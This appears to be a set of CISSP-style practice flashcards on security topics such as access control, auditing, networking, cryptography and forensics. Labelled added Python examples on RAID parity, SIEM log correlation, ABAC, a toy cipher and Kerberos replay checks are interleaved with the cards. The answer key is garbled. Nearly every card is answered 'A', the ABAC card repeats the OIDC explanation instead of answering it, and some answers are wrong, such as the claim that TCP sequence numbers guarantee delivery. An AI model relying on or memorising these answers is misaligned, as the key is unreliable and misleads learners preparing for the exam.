A. E-mail spoofing is easy to execute because SMTP lacks an adequate authentication mechanism. An attacker can spoof e-mail sender addresses by sending a Telnet command to port 25 of a mail server followed by a number of SMTP commands. Spammers use e-mail spoofing to obfuscate their identity. Oftentimes, the purported sender of a spam e-mail is actually another victim of spam whose e-mail address has been sold to or harvested by a spammer.

Corruption/modification is one of the biggest threats to an operations environment. Which of the following is the typical culprit in this type of threat? A. Employees B. Viruses C. Bad code. D. Poor maintenance procedures.

A. Employees

Which of the following is the most important reason to log events remotely? A. To prevent against log tampering B. To have several copies of the logs of every event C. To make it easier to back up the logs on a single write-once media D. To facilitate log review and analysis

A. Event logs are usually one of the first things that an intruder will seek to modify in order to cover their tracks. If events are being logged only locally, a compromise means that those logs can no longer be considered valid for investigative purposes.

To better deal with computer crime, several legislative bodies have taken what steps in their strategy? A. Expanded several privacy laws B. Broadened the definition of property to include data C. Required corporations to have computer crime insurance D. Redefined transborder issues

A. Expanded several privacy laws

What is Extensible Markup Language (XML), and why was it created? A. A specification that is used to create various types of markup languages for specific industry requirements B. A specification that is used to create static and dynamic websites C. A specification that outlines a detailed markup language dictating all formats of all companies that use it D. A specification that does not allow for interoperability for the sake of security

A. Extensible Markup Language (XML) was created as a specification to create various markup languages. From this specification, more specific markup language standards were created to be able to provide individual industries with the functions they required. Individual industries use markup languages to meet different needs, but there is an interoperability issue in that the industries still need to be able to communicate with each other.

Matches between the ___ and ___ are important because they represent references from one relation to another. A. Foreign key and primary key B. Foreign key and candidate key C. Candidate key and primary key D. Primary key and secondary key.

A. Foreign key and primary key.

In TCP, what does a sequence number do? A. Guarantees message delivery B. Disassembles and reassembles packets C. Functions as a fault code indicator D. Is used in multiplexing.

A. Guarantees message delivery

What constitutes the Trusted Computing Base (TCB)? A. Hardware, software, and firmware supporting the security policy. B. Hardware, software, and memory supporting the security policy. C. Hardware, software, and peripherals supporting the security policy. D. Hardware, software, and logic constructs supporting the security policy.

A. Hardware, software, and firmware supporting the security policy.

Which of the following best describes the difference between hierarchical storage management (HSM) and storage area network (SAN) technologies? A. HSM uses optical or tape jukeboxes, and SAN is a network of connected storage systems. B. SAN uses optical or tape jukeboxes, and HSM is a network of connected storage systems. C. HSM and SAN are one and the same. The difference is in the implementation. D. HSM uses optical or tape jukeboxes, and SAN is a standard of how to develop and implement this technology.

A. Hierarchical storage management (HSM) provides continuous online backup functionality. It combines hard disk technology with the cheaper and slower optical or tape jukeboxes. Storage area network (SAN) is made up of several storage systems that are connected together to form a single backup network.

Which of the following tunneling protocols is not well suited for dial-up? A. IPsec. B. PPTP C. PPP D. L2TP

A. IPsec.

What would be a good reason for the use of thin clients for a company that wants to implement stronger access control? A. Limits users to the functions and capabilities of a secured operating system. B. Fewer desktops to purchase. C. User training is reduced. D. Programs become more readily available to users.

A. Limits users to the functions and capabilities of a secured operating system.

The process of mutual authentication involves _______________. A. a user authenticating to a system and the system authenticating to the user B. a user authenticating to two systems at the same time C. a user authenticating to a server and then to a process D. a user authenticating, receiving a ticket, and then authenticating to a service

A. Mutual authentication means it is happening in both directions. Instead of just the user having to authenticate to the server, the server also must authenticate to the user.

Part of the collection and identification stage of the evidence life cycle is marking or labeling evidence. Which statement is not true regarding marking evidence? A. Never mark on the original evidence. B. Seal evidence in envelopes C. When sealing evidence, write on the tape that seals it shut. D. Include initials, date, and case number on your mark.

A. Never mark on the original evidence.

Which of the following is NOT true of OpenID Connect (OIDC)? A. It is mainly used as an open standards-based single sign-on (SSO) mechanism between disparate platforms within an enterprise environment. B. It is layered on the OAuth protocol to allow both authentication and authorization in a transparent way for client resource requests. C. It supports three flows: authorization code flow, implicit flow, and hybrid flow. D. It involves browser redirections from the OpenID provider back to the relying party using authorization codes.

A. OAuth, OpenID, and OIDC are all open protocols and standards for use in authentication and authorization across, rather than within, enterprises to facilitate federated identity management (IdM)

Which of the following attributes are added beyond traditional access control mechanisms (RBAC, MAC, and DAC) in order to implement ABAC? A. Subjects B. Objects C. Actions D. Context

A. OAuth, OpenID, and OIDC are all open protocols and standards for use in authentication and authorization across, rather than within, enterprises to facilitate federated identity management (IdM).

Which of the following is true of a vulnerability assessment? A. The aim is to identify as many vulnerabilities as possible. B. It is not concerned with the effects of the assessment on other systems. C. It is a predictive test aimed at assessing the future performance of a system. D. Ideally the assessment is fully automated with no human involvement.

A. One of the principal goals of a vulnerability assessment is to identify as many security flaws as possible within a given system, while being careful not to disrupt other systems.

What is the difference between POP and IMAP? A. POP downloads e-mail to the user, and IMAP gives the user the choice of downloading or keeping it on the mail server. B. POP gives the user the choice of downloading mail messages or keeping them on the server, and IMAP automatically downloads the messages to the user's computer. C. POP is used when messages need to be transmitted over the Internet, and IMAP is used when the messages are exchanged in-house. D. IMAP is used when the messages need to be transmitted over the Internet, and POP is used when the messages are exchanged in-house.

A. POP downloads e-mail to the user, and IMAP gives the user the choice of downloading it or keeping it on the mail server.

____ are instructions that tell a RAID system how to rebuild the lost data on the new hard drive. A. Parity B. Clustering C. Striping D. ECC

A. Parity
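The parity in the answer above is ordinary XOR arithmetic, and a short program shows both halves of it: how the parity block is computed for each stripe and how a lost drive is rebuilt from the survivors. This is an added example, not part of the flashcards; the block size, the three-data-drive layout and the sample payload are constructed for the demonstration.

```python
"""XOR parity as RAID uses it: computing parity and rebuilding a lost drive.

Added example, not from the flashcards. Data is split into fixed-size blocks
across N data drives and a parity block per stripe holds the XOR of the data
blocks; any single lost drive (data or parity) is recovered by XOR-ing the
surviving blocks in each stripe. Block size, drive count and the sample
payload are constructed for the demonstration.
"""

BLOCK = 4  # bytes per block, tiny so the arrays are readable


def xor_blocks(blocks):
    """Byte-wise XOR of equal-length byte strings."""
    out = bytearray(len(blocks[0]))
    for b in blocks:
        for i, byte in enumerate(b):
            out[i] ^= byte
    return bytes(out)


def stripe(data, n_data):
    """Lay data out over n_data data drives plus one parity drive.

    Returns a list of drives, each a list of blocks (one per stripe). Drives
    0..n_data-1 hold data, drive n_data holds parity (a RAID 4 layout; RAID 5
    rotates the parity position per stripe, which does not change the math).
    Data is zero-padded to a whole number of stripes.
    """
    stripe_bytes = BLOCK * n_data
    data = data + b"\x00" * (-len(data) % stripe_bytes)
    drives = [[] for _ in range(n_data + 1)]
    for off in range(0, len(data), stripe_bytes):
        row = [data[off + i * BLOCK: off + (i + 1) * BLOCK] for i in range(n_data)]
        for i, blk in enumerate(row):
            drives[i].append(blk)
        drives[n_data].append(xor_blocks(row))   # parity = XOR of the data blocks
    return drives


def rebuild(drives, lost):
    """Reconstruct drive `lost` (whose entry is None): per stripe, XOR the survivors."""
    n_stripes = len(next(d for d in drives if d is not None))
    rebuilt = []
    for s in range(n_stripes):
        survivors = [drives[d][s] for d in range(len(drives)) if d != lost]
        rebuilt.append(xor_blocks(survivors))
    return rebuilt


def read_data(drives, n_data):
    """Reassemble the (padded) payload from the data drives only."""
    n_stripes = len(drives[0])
    return b"".join(drives[d][s] for s in range(n_stripes) for d in range(n_data))


def demo(lost=1, n_data=3, payload=b"RAID parity example: the lost drive comes back!"):
    """Fail one drive, rebuild it, and report (rebuilt == original, payload intact)."""
    drives = stripe(payload, n_data)
    original = list(drives[lost])
    drives[lost] = None                    # simulate the drive failure
    drives[lost] = rebuild(drives, lost)   # rebuild onto the replacement drive
    return drives[lost] == original, read_data(drives, n_data).rstrip(b"\x00") == payload
```

Because XOR is its own inverse, the same routine rebuilds a data drive or the parity drive; what it cannot do is survive two simultaneous failures, which is why RAID 6 adds a second, independently computed parity block.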

Which of the following is not normally an element of user accounts management audits? A. Password hashing B. Signed AUPs C. Privileged accounts D. Suspended accounts

A. Password hashing (covered in Chapter 5) is a very common approach to protecting user account passwords, but varies from one platform to the next. It is almost always controlled by the system itself and would normally not be part of the user accounts management audit.

RADIUS is considered an open protocol, which means what? A. RADIUS is now a standard that is outlined in RFC 2138 and RFC 2139. Any vendor can follow these standards and develop the protocol to work within their product. B. RADIUS is open source, which means that any vendor can contact Cisco and receive the code for free. C. RADIUS is not an open protocol, but a de facto standard. D. RADIUS is a proprietary protocol, but open to any vendor who pays the fee to use it.

A. RADIUS is a standard outlined in RFC 2138 and RFC 2139 (since superseded by RFC 2865 and RFC 2866). Any vendor can follow these standards and implement the protocol within their product.

Which centralized access control authentication protocol is also an adopted Internet standard? A. RADIUS. B. TACACS. C. SecurID. D. CRYPTOCard.

A. RADIUS.

What is the best description of a security kernel from a security point of view? A. Reference monitor B. Resource manager C. Memory mapper D. Security perimeter

A. Reference monitor

With respect to external audits, what is the difference between a second-party audit and a third-party audit? A. A second-party audit is typically tied to the terms of a contract between business entities, while a third-party audit is usually used to determine if an entity is compliant with applicable government regulations. B. A third-party audit is typically tied to the terms of a contract between business entities, while a second-party audit is usually used to determine if an entity is compliant with applicable government regulations. C. A third-party audit is performed without the assistance of the entity's internal teams, whereas a second-party audit makes extensive use of them. D. There is no real distinction. Both terms can be used interchangeably.

A. Second-party audits are typically performed by external parties, in order to give business partners the assurance that the entity being audited is living up to the terms of contractual agreements between the two with respect to due care and due diligence in the handling of the business partner's assets. Third-party audits are commonly performed as part of an entity's requirements to satisfy regulatory compliance with respect to systems processing information deemed to be in the public interest.

Dan is going to send sensitive data over a potentially compromised network link. Which of the following technologies is least likely to help him ensure that the data is not intercepted in transit? A. Secure Sockets Layer (SSL) B. Transport Layer Security (TLS) C. Virtual Private Network (VPN) D. Internet Protocol Security (IPSec)

A. Secure Sockets Layer (SSL). All four encrypt traffic in transit, but SSL is the deprecated predecessor of TLS: every SSL version has known weaknesses, so it is the one least likely to protect the data.

Use the following scenario to answer Questions 36-38. Lance has been brought in as a new security officer for a large medical equipment company. He has been told that many of the firewalls and IDS products have not been configured to filter IPv6 traffic; thus, many attacks have been taking place without the knowledge of the security team. While the network team has attempted to implement an automated tunneling feature to take care of this issue, they have continually run into problems with the network's NAT device. Lance has also found out that caching attacks have been successful against the company's public-facing DNS server. He has also identified that extra authentication is necessary for current LDAP requests, but the current technology only provides password-based authentication options. Based upon the information in the scenario, what should the network team implement as it pertains to IPv6 tunneling? A. Teredo should be configured on IPv6-aware hosts that reside behind the NAT device. B. 6to4 should be configured on IPv6-aware hosts that reside behind the NAT device. C. Intra-Site Automatic Tunnel Addressing Protocol should be configured on IPv6-aware hosts that reside behind the NAT device. D. IPv6 should be disabled on all systems.

A. Teredo encapsulates IPv6 packets within UDP datagrams with IPv4 addressing. IPv6-aware systems behind the NAT device can be used as Teredo tunnel endpoints even if they do not have a dedicated public IPv4 address.

Which of the following is not true of a forensic investigation? A. The crime scene should be modified as necessary. B. A file copy tool may not recover all data areas of the device that are necessary for investigation. C. Contamination of the crime scene may not negate derived evidence, but it should still be documented. D. Only individuals with knowledge of basic crime scene analysis should have access to the crime scene.

A. The principles of criminalistics are included in the forensic investigation process. They are identification of the crime scene, protection of the environment against contamination and loss of evidence, identification of evidence and potential sources of evidence, and collection of evidence. In regard to minimizing the degree of contamination, it is important to understand that it is impossible not to change a crime scene—be it physical or digital. The key is to minimize changes and document what you did and why, and how the crime scene was affected.

A disaster recovery team has begun its initial assessment of all physical security risks and associated countermeasures. There are several factors to consider. Which should bear the most weight? A. The protection of life. B. The protection of critical assets. C. The protection of data D. Ensuring compliance with state and national regulations.

A. The protection of life.

John is the new director of software development within his company. Several proprietary applications offer individual services to the employees, but the employees have to log into each and every application independently to gain access to these discrete services. John would like to provide a way that allows each of the services provided by the various applications to be centrally accessed and controlled. Which of the following best describes the architecture that John should deploy? A. Service-oriented architecture B. Web services architecture C. Single sign-on architecture D. Hierarchical service architecture

A. The use of web services in this manner also allows organizations to provide service-oriented architecture (SOA) environments. SOA is a way to provide independent services residing on different systems in different business domains in one consistent manner. This architecture is a set of principles and methodologies for designing and developing software in the form of interoperable services.

Which of the following is usually NOT considered when classifying data? A. The user base of the data. B. The value of the data C. The age of the data D. The usefulness of the data.

A. The user base of the data.

Joan needs to document a data classification scheme for her organization. Which criteria should she use to guide her decisions? A. The value of the data and the age of the data. B. legal responsibilities based on ISO regulations. C. Who will be responsible for protecting the data and how D. How an adverse data breach would be handled.

A. The value of the data and the age of the data.

Tanya is the security administrator for a large distributed retail company. The company's network has many different network devices and software appliances that generate logs and audit data. Tanya and her staff have become overwhelmed with trying to review all of the log files when attempting to identify if anything suspicious is taking place within the network. Which of the following is the best solution for this company to implement? A. Security information and event management B. Event correlation tools C.Intrusion detection systems D. Security event correlation management tools

A. Today, many organizations are implementing security event management (SEM) systems, also called security information and event management (SIEM) systems. These products gather logs from various devices (servers, firewalls, routers, etc.) and attempt to correlate the log data and provide analysis capabilities. Companies also have different types of solutions on a network (IDS, IPS, antimalware, proxies, etc.) collecting logs in various proprietary formats, which require centralization, standardization, and normalization. Log formats are different per product type and vendor; thus, SIEM puts them into a standardized format for useful reporting.
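The "centralization, standardization, and normalization" the answer describes is easiest to see in code. The following is an added example, not part of the flashcards: two constructed log feeds in different native formats are parsed into one common event schema, and a correlation rule then counts authentication failures per source address across both feeds, something neither log shows on its own. Hostnames, log lines, field names and the alert threshold are all made up for the illustration.

```python
"""Log normalization and correlation, the core of what a SIEM does.

Added example, not from the flashcards. Two constructed log sources with
different native formats (a syslog-style sshd line and a VPN concentrator's
key=value line) are parsed into one common event schema; a correlation rule
then counts authentication failures per source address across both feeds.
Log lines, hostnames, field names and the threshold are made up.
"""
import re
from collections import Counter

# Constructed sample lines (not real logs).
SSHD_LOGS = [
    "Mar 10 09:01:12 web01 sshd[2231]: Failed password for root from 203.0.113.7 port 51522 ssh2",
    "Mar 10 09:01:15 web01 sshd[2231]: Failed password for root from 203.0.113.7 port 51530 ssh2",
    "Mar 10 09:02:01 web01 sshd[2240]: Accepted password for deploy from 198.51.100.4 port 40022 ssh2",
]
VPN_LOGS = [
    "ts=2024-03-10T09:01:20Z dev=vpn01 action=deny src=203.0.113.7 user=root msg=auth_fail",
    "ts=2024-03-10T09:01:22Z dev=vpn01 action=deny src=203.0.113.7 user=admin msg=auth_fail",
    "ts=2024-03-10T09:03:00Z dev=vpn01 action=allow src=198.51.100.4 user=deploy msg=tunnel_up",
]

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]+) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?P<user>\S+) from (?P<src>[\d.]+)"
)


def parse_sshd(line):
    """Syslog-style free text: regex out the fields we care about."""
    m = SSHD_RE.match(line)
    if not m:
        return None  # unparsed lines are dropped here; a real SIEM keeps them as raw events
    return {
        "source": m["host"],
        "src_ip": m["src"],
        "user": m["user"],
        "category": "authentication",
        "outcome": "failure" if m["result"] == "Failed" else "success",
    }


def parse_vpn(line):
    """key=value format: split into a dict, then map onto the common schema."""
    kv = dict(tok.split("=", 1) for tok in line.split())
    return {
        "source": kv["dev"],
        "src_ip": kv["src"],
        "user": kv.get("user"),
        "category": "authentication" if kv.get("msg", "").startswith("auth") else "network",
        "outcome": "failure" if kv.get("action") == "deny" else "success",
    }


def normalize(sshd_lines=SSHD_LOGS, vpn_lines=VPN_LOGS):
    """Turn both feeds into one list of events sharing the same field names."""
    events = [e for e in map(parse_sshd, sshd_lines) if e is not None]
    events += [parse_vpn(line) for line in vpn_lines]
    return events


def correlate_failed_logins(events, threshold=3):
    """Rule: flag any src_ip with >= threshold authentication failures, whatever the source."""
    fails = Counter(
        e["src_ip"] for e in events
        if e["category"] == "authentication" and e["outcome"] == "failure"
    )
    return {ip: n for ip, n in fails.items() if n >= threshold}
```

Each feed alone shows two failures from 203.0.113.7, below a threshold of three; only after normalization can the rule add them up to four and raise the alert. Timestamps are carried as-is here; a production pipeline would convert the syslog and ISO 8601 forms to one clock so that time-window rules work across sources too.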

To protect a specific word, symbol or name, a company would acquire which of the following? A. Trademark B. Copyright C. patent D. Trade Secret.

A. Trademark.

Which OSI layer handles flow control? A. Transport B. Data link C. Physical D. Network

A. Transport

Which of the following makes the most sense for a single organization's classification levels for data? A. Unclassified, Secret, Top Secret B. Public, Releasable, Unclassified C. Sensitive, Sensitive But Unclassified (SBU), Proprietary D. Proprietary, Trade Secret, Private

A. Unclassified, Secret, Top Secret

Why is "test coverage" an important consideration during an audit? A. The percentage of systems or controls to be tested should not exceed the threshold beyond which further testing yields no additional results or useful information, in order to limit unnecessary expense. B. The coverage of any given test should always include all possible systems and controls within scope of the audit. Nothing should be excluded unnecessarily. C. Tests should cover not only the systems in scope, but also the adjoining or ancillary systems whose configurations may possibly affect the systems within scope. D. The systems to be covered within any given test should not be decided by the enterprise being tested, but rather designated only by a third-party assessor.

A. When testing a set of controls across a fleet of systems, if it can be determined that they are uniformly configured and deployed, it may make little sense to inspect each of them individually, and certainly will increase the cost of the assessment. As with any activity within a business environment, costs and benefits must be considered with a goal of achieving the best balance between them.

Use the following scenario to answer Questions 1-3. Josh has discovered that an organized hacking ring in China has been targeting his company's research and development department. If these hackers have been able to uncover his company's research findings, this means they probably have access to his company's intellectual property. Josh thinks that an e-mail server in his company's DMZ may have been successfully compromised and a rootkit loaded. 1. Based upon this scenario, what is most likely the biggest risk Josh's company needs to be concerned with? A. Market share drop if the attackers are able to bring the specific product to market more quickly than Josh's company. B. Confidentiality of e-mail messages. Attackers may post all captured e-mail messages to the Internet. C. Impact on reputation if the customer base finds out about the attack. D. Depth of infiltration of attackers. If attackers have compromised other systems, more confidential data could be at risk.

A. While they are all issues to be concerned with, risk is a combination of probability and business impact. The largest business impact out of this list and in this situation is the fact that intellectual property for product development has been lost. If a competitor can produce the product and bring it to market quickly, this can have a long-lasting financial impact on the company.

In the structure of Extensible Access Control Markup Language (XACML), a Subject element is the ____________, a Resource element is the _____________, and an Action element is the ____________. A. requesting entity, requested entity, types of access B. requested entity, requesting entity, types of access C. requesting entity, requested entity, access control D. requested entity, requesting entity, access control

A. XACML uses a Subject element (requesting entity), a Resource element (requested entity), and an Action element (types of access). XACML defines a declarative access control policy language implemented in XML.
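A small policy decision point ties this XACML vocabulary to the ABAC question earlier on the page (the one asking which attribute ABAC adds beyond subjects, objects and actions). The block below is an added example, not part of the flashcards or of any XACML implementation: the Subject, Resource and Action of a request are evaluated against three rules, one of which depends only on Environment (context) attributes, and the results are combined with XACML's deny-overrides algorithm. The attribute names, rules, sample users, documents and times are all made up.

```python
"""A minimal attribute-based access control (ABAC) policy decision point.

Added example, not from the flashcards. It uses the XACML vocabulary: the
Subject is the requesting entity, the Resource the requested entity and the
Action the type of access; the Environment (context) attributes are what
ABAC adds beyond the subject/object/action that RBAC, MAC and DAC already
work with. Attribute names, the three rules and the sample users, documents
and times are all made up; the combining algorithm is XACML's deny-overrides.
"""
from dataclasses import dataclass, field
from datetime import time


@dataclass
class Request:
    subject: dict                                 # requesting entity
    resource: dict                                # requested entity
    action: str                                   # type of access
    context: dict = field(default_factory=dict)   # environment attributes (the ABAC addition)


LEVELS = {"public": 0, "internal": 1, "confidential": 2, "secret": 3}


def rule_clearance(req):
    """Subject clearance must dominate the resource classification (a MAC-style attribute check)."""
    if LEVELS[req.subject["clearance"]] >= LEVELS[req.resource["classification"]]:
        return "Permit"
    return "Deny"


def rule_department(req):
    """Writes are only permitted from the department that owns the resource."""
    if req.action != "write":
        return "NotApplicable"
    return "Permit" if req.subject["department"] == req.resource["owner_department"] else "Deny"


def rule_context(req):
    """Context rule: writes to confidential or higher data only 08:00-18:00 from the corporate network."""
    if req.action != "write" or LEVELS[req.resource["classification"]] < LEVELS["confidential"]:
        return "NotApplicable"
    now = req.context.get("time")
    if now is None or not (time(8, 0) <= now <= time(18, 0)):
        return "Deny"
    if req.context.get("network") != "corporate":
        return "Deny"
    return "Permit"


RULES = [rule_clearance, rule_department, rule_context]


def decide(req):
    """Deny-overrides: any Deny wins, else any Permit, else NotApplicable."""
    results = [rule(req) for rule in RULES]
    if "Deny" in results:
        return "Deny"
    if "Permit" in results:
        return "Permit"
    return "NotApplicable"


def sample_requests():
    """Constructed requests: the last two differ from the first two only in who asks or in context."""
    alice = {"id": "alice", "clearance": "confidential", "department": "finance"}
    bob = {"id": "bob", "clearance": "internal", "department": "finance"}
    ledger = {"id": "ledger.xlsx", "classification": "confidential", "owner_department": "finance"}
    office = {"time": time(10, 0), "network": "corporate"}
    late_vpn = {"time": time(22, 30), "network": "vpn"}
    return {
        "alice_reads_ledger": Request(alice, ledger, "read", office),
        "alice_writes_ledger_in_office": Request(alice, ledger, "write", office),
        "alice_writes_ledger_late_over_vpn": Request(alice, ledger, "write", late_vpn),
        "bob_reads_ledger": Request(bob, ledger, "read", office),
    }


def evaluate_samples():
    return {name: decide(req) for name, req in sample_requests().items()}
```

The two write requests from alice have identical Subject, Resource and Action; only the Environment differs, and that alone flips the decision from Permit to Deny. That is the point the ABAC question is making: no combination of RBAC roles, MAC labels or DAC permissions expresses "only during office hours from the corporate network" without a context attribute.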

If the Annual Loss Expectancy (ALE) for a specific asset is $100,000, and after implementation of the control the new ALE is $45,000 and the annual cost of the control is $30,000, should the company implement this control? A. Yes B. No C. Not enough information D. Depends on the Annualized Rate of Occurrence (ARO)

A. Yes, the company should implement the control, as the value would be $25,000.

Which of the following best describes the difference between an information systems contingency plan and disaster recovery plan? A. information systems contingency plan procedures are developed for recovery of the system regardless of site or location. B. Disaster recovery plan procedures are developed for recovery of the system regardless of site or location. C. Disaster recovery plan can be activated at the system's current location or at an alternate site. D. information systems contingency plan is primarily a site-specific plan.

A. information systems contingency plan procedures are developed for recovery of the system regardless of site or location.

Block ciphers use which of the following to perform mathematical functions, substitutions, and permutations on message bits? A. s-boxes B. certificates. C. keystream D. initialization vectors

A. s-boxes
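One round of a substitution-permutation network makes the S-box's job concrete: the key is mixed in, each nibble is substituted through the S-box table (confusion), then the bits are permuted across nibbles (diffusion), so a one-bit change in the input spreads over the whole block after a few rounds. The block below is an added example, not part of the flashcards and not a real cipher: the 16-bit block size, the 4-bit S-box table, the bit transposition and the round keys are toy values of the kind used in textbook SPN tutorials, chosen only to show the mechanism.

```python
"""A toy substitution-permutation network (SPN) on 16-bit blocks.

Added example, not from the flashcards and not a real cipher. It shows what
the S-box (substitution) and P-box (permutation) layers do in a block cipher
round. The 4-bit S-box, the bit permutation and the round keys are toy values
for illustration only.
"""

# 4-bit S-box: maps each nibble 0..15 to another nibble (a bijection, so it inverts).
SBOX = [0xE, 0x4, 0xD, 0x1, 0x2, 0xF, 0xB, 0x8, 0x3, 0xA, 0x6, 0xC, 0x5, 0x9, 0x0, 0x7]
INV_SBOX = [SBOX.index(i) for i in range(16)]

# P-box: output bit i takes input bit PBOX[i] (bit 0 = least significant).
# This one transposes the block viewed as a 4x4 bit matrix, so bit b of nibble n
# moves to bit n of nibble b; every nibble's output feeds all four S-boxes next round.
PBOX = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
INV_PBOX = [PBOX.index(i) for i in range(16)]

KEYS = [0x1A2B, 0x3C4D, 0x5E6F]   # three round keys, constructed for the example


def substitute(block, table):
    """Apply a 4-bit S-box to each of the four nibbles of a 16-bit block."""
    out = 0
    for n in range(4):
        nibble = (block >> (4 * n)) & 0xF
        out |= table[nibble] << (4 * n)
    return out


def permute(block, table):
    """Move each bit of the block to the position the table dictates."""
    out = 0
    for i in range(16):
        out |= ((block >> table[i]) & 1) << i
    return out


def round_encrypt(block, round_key):
    """Key mixing -> substitution (confusion) -> permutation (diffusion)."""
    return permute(substitute(block ^ round_key, SBOX), PBOX)


def round_decrypt(block, round_key):
    """Undo the round: inverse permutation, inverse S-box, then strip the key."""
    return substitute(permute(block, INV_PBOX), INV_SBOX) ^ round_key


def encrypt(block, keys=KEYS):
    for k in keys:
        block = round_encrypt(block, k)
    return block


def decrypt(block, keys=KEYS):
    for k in reversed(keys):
        block = round_decrypt(block, k)
    return block


def bits_changed(a, b):
    """Hamming distance between two blocks; used to watch the avalanche effect."""
    return bin(a ^ b).count("1")
```

Flipping the lowest bit of the plaintext 0x1234 changes 9 of the 16 ciphertext bits after three rounds; with only the S-box and no permutation, the change would stay inside one nibble no matter how many rounds were run, which is why both layers are needed.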

MODAF

Architecture framework developed by the UK Ministry of Defence and used mainly for military support missions.

The responsibility of the classification of data within an organization rests with whom? A. Data custodians. B. Senior management. C. Data classifiers. D. Unit managers.

B. Senior management.

Use the following scenario to answer Questions 22-24. A small remote office for a company is valued at $800,000. It is estimated, based on historical data, that a fire is likely to occur once every ten years at a facility in this area. It is estimated that such a fire would destroy 60 percent of the facility under the current circumstances and with the current detective and preventive controls in place. What is the single loss expectancy (SLE) for the facility suffering from a fire? A. $80,000 B. $480,000 C. $320,000 D. 60%

B. $480,000

There are several different types of databases. Which type does the graphic that follows illustrate? A. Relational B. Hierarchical C. Network D. Object-oriented

B. A hierarchical database uses a tree-like structure to define relationships between data elements, using a parent/child relationship. The structure and relationship between the data elements are different from those in a relational database. The tree structure contains branches, and each branch has a number of leaves, or data fields. These databases have well-defined, prespecified access paths, but they are not as flexible in creating relationships between data elements as a relational database. Hierarchical databases are useful for mapping one-to-many relationships.

Which best describes a hot-site facility versus a warm- or cold-site facility? A. A site that has disk drives, controllers, and tape drives B. A site that has all necessary PCs, servers, and telecommunications C. A site that has wiring, central air-conditioning, and raised flooring D. A mobile site that can be brought to the company's parking lot

B. A hot site is a facility that is fully equipped and properly configured so that it can be up and running within hours to get a company back into production. Answer B gives the best definition of a fully functional environment.

Which of the following is not a common component of configuration management change control steps? A. Tested and presented B. Service level agreement approval C. Report change to management D. Approval of the change

B. A well-structured change management process should be established to aid staff members through many different types of changes to the environment. This process should be laid out in the change control policy. Although the types of changes vary, a standard list of procedures can help keep the process under control and ensure it is carried out in a predictable manner. A change control policy should include procedures for requesting a change to take place, approving the change, documentation of the change, testing and presentation, implementation, and reporting the change to management. Configuration management change control processes do not commonly have an effect on service level agreement approvals.

What role should accountability play in the access to media and authorization portion of a company's operations security strategy policies? A. None. Accountability is managed by corporate security policies, not at the operator level. B. Accountability is the other side of the coin of authorization. If a user is properly authorized, any violations or errors he makes can be traced back to him. C. Accountability means that the creator of the company's access policy bears final accountability for any improper accesses. D. Accountability means that the entire IT department, as creator of the company's access policy, bears final accountability for any improper access.

B. Accountability is the other side of the coin of authorization. If a user is properly authorized, any violations or errors he makes can be traced back to him.

There are often scenarios where the IT staff must react to emergencies and quickly apply fixes or change configurations. When dealing with such emergencies, which of the following is the best approach to making changes? A. Review the changes within 48 hours of making them. B. Review and document the emergency changes after the incident is over. C. Activity should not take place in this manner. D. Formally submit the change to a change control committee and follow the complete change control process.

B. After the incident or emergency is over, the staff should review the changes to ensure that they are correct and do not open security holes or affect interoperability. The changes need to be properly documented and the system owner needs to be informed of changes.

Your company enters into a contract with another company as part of which your company requires the other company to abide by specific security practices. Six months into the effort, you decide to verify that the other company is satisfying these security requirements. Which of the following would you conduct? A. Third-party audit B. External (second-party) audit C. Structured walk-through test D. Full-interruption test

B. An external audit (sometimes called a second-party audit) is one conducted by (or on behalf of) a business partner to verify contractual obligations. Though it is possible that this be done by a third party (e.g., an auditing firm hired by either party), it is still an external audit because it is being done to satisfy an external entity.

What component of Kerberos helps mitigate replay attacks? A. Key distribution Center. B. Authenticator. C. Asymmetric Cryptography. D. Realms.

B. Authenticator.
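What the authenticator actually buys against replay is easy to show in code. The block below is an added example, not part of the flashcards and not a Kerberos library: the client builds an authenticator carrying its name and a timestamp under the session key; the service checks the timestamp against the allowed clock skew and keeps a replay cache of (client, timestamp) pairs, so a captured authenticator re-sent inside the skew window is caught by the cache and one re-sent later is caught by the skew check. To stay self-contained, the session-key protection is an HMAC tag rather than the real Kerberos encryption, and the client address and sequence-number fields a real authenticator also carries are left out.

```python
"""How a Kerberos authenticator defeats replay.

Added example, not from the flashcards and not a Kerberos implementation. The
authenticator sent with a service ticket carries the client name and a
timestamp, protected by the session key. The service (a) rejects timestamps
outside the allowed clock skew and (b) keeps a replay cache of recently seen
(client, timestamp) pairs. The HMAC tag stands in for the real encryption so
the example runs offline; the key, names and times are constructed.
"""
import hashlib
import hmac
import json

CLOCK_SKEW = 300  # seconds; the customary Kerberos default is five minutes


def _tag(session_key, body):
    return hmac.new(session_key, json.dumps(body, sort_keys=True).encode(), hashlib.sha256).hexdigest()


def make_authenticator(session_key, client, now):
    """Client side: name plus current time, protected under the session key."""
    body = {"client": client, "ctime": now}
    return {"body": body, "tag": _tag(session_key, body)}


class Service:
    """Service side: verifies authenticators and remembers the ones it has seen."""

    def __init__(self, session_key):
        self.session_key = session_key
        self.replay_cache = set()   # (client, ctime) pairs seen inside the skew window

    def accept(self, auth, now):
        body = auth["body"]
        if not hmac.compare_digest(_tag(self.session_key, body), auth["tag"]):
            return False, "bad integrity (wrong session key)"
        if abs(now - body["ctime"]) > CLOCK_SKEW:
            return False, "clock skew too great"
        key = (body["client"], body["ctime"])
        if key in self.replay_cache:
            return False, "replay detected"
        self.replay_cache.add(key)
        self._expire(now)
        return True, "ok"

    def _expire(self, now):
        """Entries older than the skew window can go: the skew check rejects them anyway."""
        self.replay_cache = {k for k in self.replay_cache if now - k[1] <= CLOCK_SKEW}
```

The two checks are complementary: the skew window bounds how long a captured authenticator is usable at all, and the replay cache closes the window that remains. Both depend on the client and service clocks being roughly in step, which is why Kerberos deployments run time synchronization.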

For which of the following physical media is degaussing a relatively cheap and effective means of eradicating data? A. Optical disks (cd/dvds) B. Backup tapes. C. USB thumb drives. D. Hard disk drives (HDDs)

B. Backup tapes.

When a process creates a thread, because it needs some instructions and data processed, the CPU uses two registers. A ____ contains the beginning address that was assigned to the process, and a ____ contains the ending address. A. limit register, base register. B. Base register, limit register. C. dedicated register, limit register. D. limit register, special register.

B. Base register, limit register.

